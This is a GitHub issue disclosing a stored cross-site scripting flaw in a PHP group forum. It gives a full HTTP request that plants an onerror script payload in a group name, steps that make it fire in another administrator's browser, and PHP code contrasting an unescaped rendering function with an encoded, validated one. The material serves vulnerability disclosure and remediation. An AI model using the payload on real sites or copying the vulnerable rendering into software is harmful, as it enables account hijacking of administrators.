
Stored XSS when an administrator edits posts in the same group, or just clicks a URL #20

Open
ChandlerChin opened this issue Sep 21, 2019 · 1 comment


ChandlerChin commented Sep 21, 2019

Stored XSS, triggered when a group administrator edits posts within the group, or simply by clicking a URL.

Steps to reproduce:

1. admin1 creates a new group with the following request; notice that the malicious code has been injected into the groupname parameter.

```http
POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"

<img src=1 onerror=alert(1)>
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------159522762613371
Content-Disposition: form-data; name="tag"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"

99dc80d60a3284e86a8eef06c28a932f5614d29a
-----------------------------159522762613371--
```

2. admin1 invites admin2 as an administrator of this new group and posts anything. PS: no consent is required; one can invite anyone as a group administrator.
3. Once admin2 edits any post in this group, or just clicks http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id_which_easy_to_get}
admin2's browser executes the JS code that was injected into the group name.
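The root cause described in the report is the stored group name being written into the topic-edit page without output encoding. The following PHP is an added illustration, not code from the affected project: it places the unescaped rendering pattern beside a hardened renderer that encodes for the HTML context, plus an assumed create-time validation rule. Function names and the topic id are constructed for this example; the payload is the one from the report.

```php
<?php
// Added example, not code from the reported project. Requires PHP 8 (str_contains).
declare(strict_types=1);

// Payload from the report, as stored by the group-create request's "groupname" field.
const STORED_GROUPNAME = '<img src=1 onerror=alert(1)>';

// Vulnerable pattern: the stored value is concatenated straight into the edit page,
// so the stored markup becomes live HTML in the administrator's browser.
function renderTopicEditVulnerable(string $groupName, int $topicId): string
{
    return "<h2>Edit topic in group: $groupName</h2>\n"
         . "<input type=\"hidden\" name=\"groupname\" value=\"$groupName\">\n"
         . "<input type=\"hidden\" name=\"topicid\" value=\"$topicId\">";
}

// Hardened pattern: every stored value is encoded for the HTML context it lands in.
// ENT_QUOTES covers attribute values delimited by either quote character;
// ENT_SUBSTITUTE avoids silently returning "" on invalid UTF-8.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderTopicEditHardened(string $groupName, int $topicId): string
{
    return "<h2>Edit topic in group: " . h($groupName) . "</h2>\n"
         . "<input type=\"hidden\" name=\"groupname\" value=\"" . h($groupName) . "\">\n"
         . "<input type=\"hidden\" name=\"topicid\" value=\"" . h((string) $topicId) . "\">";
}

// Defence in depth for the create handler (assumed policy, not the project's own):
// a group name has no legitimate need for markup, so reject it at input time too.
// Allows letters, digits, space, underscore and hyphen, 1 to 50 characters.
function isValidGroupName(string $name): bool
{
    return preg_match('/^[\p{L}\p{N} _\-]{1,50}$/u', $name) === 1;
}

$topicId = 42; // constructed value standing in for {your_topic_id}
$vuln = renderTopicEditVulnerable(STORED_GROUPNAME, $topicId);
$safe = renderTopicEditHardened(STORED_GROUPNAME, $topicId);

echo 'vulnerable output contains a live <img> tag: ' . (str_contains($vuln, '<img') ? 'yes' : 'no') . "\n";
echo 'hardened output contains a live <img> tag:   ' . (str_contains($safe, '<img') ? 'yes' : 'no') . "\n";
echo 'create-time validation accepts the payload:  ' . (isValidGroupName(STORED_GROUPNAME) ? 'yes' : 'no') . "\n";
echo $safe . "\n";
```

Run with `php example.php`; the hardened output renders the stored name as visible text (`&lt;img src=1 onerror=alert(1)&gt;`) in both the heading and the hidden input, and the validation rule rejects the payload at creation time.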


OS-WS commented Dec 31, 2020

Hi, is there a fix for CVE-2019-16664?
If so, in what commit?

thanks in advance 💯
